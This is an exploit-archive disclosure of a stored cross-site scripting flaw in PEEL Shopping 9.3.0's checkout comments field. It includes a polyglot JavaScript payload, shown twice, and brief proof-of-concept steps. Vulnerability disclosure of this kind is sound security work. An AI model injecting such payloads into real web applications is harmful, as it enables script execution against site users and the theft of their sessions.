PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting

vendor:

PEEL SHOPPING

by:

Anmol K Sachan

N/A

CVSS

N/A

Stored Cross-site Scripting

CWE

Product Name: PEEL SHOPPING

Affected Version From: 9.3.2000

Affected Version To: 9.3.2000

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 XAMPP

2021

PEEL Shopping 9.3.0 – ‘Comments/Special Instructions’ Stored Cross-Site Scripting

This application is vulnerable to Stored XSS vulnerability. The vulnerable script is http://localhost/peel-shopping_9_3_0/achat/achat_maintenant.php and the vulnerable parameter is 'Comments / Special Instructions :'. The payload used for exploitation is jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e

Mitigation:

Implement proper input validation and output encoding to prevent XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting
# Date: 2021-02-16
# Exploit Author: Anmol K Sachan
# Vendor Homepage: https://www.peel.fr/
# Software Link: https://sourceforge.net/projects/peel-shopping/
# Software: PEEL SHOPPING 9.3.0
# Vulnerability Type: Stored Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10 XAMPP
# This application is vulnerable to Stored XSS vulnerability.
# Vulnerable script: http://localhost/peel-shopping_9_3_0/achat/achat_maintenant.php
# Vulnerable parameters: 'Comments / Special Instructions :'
# Payload used:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

# POC: in the same page where we injected payload refresh the page.
# You will see your Javascript code (XSS) executed.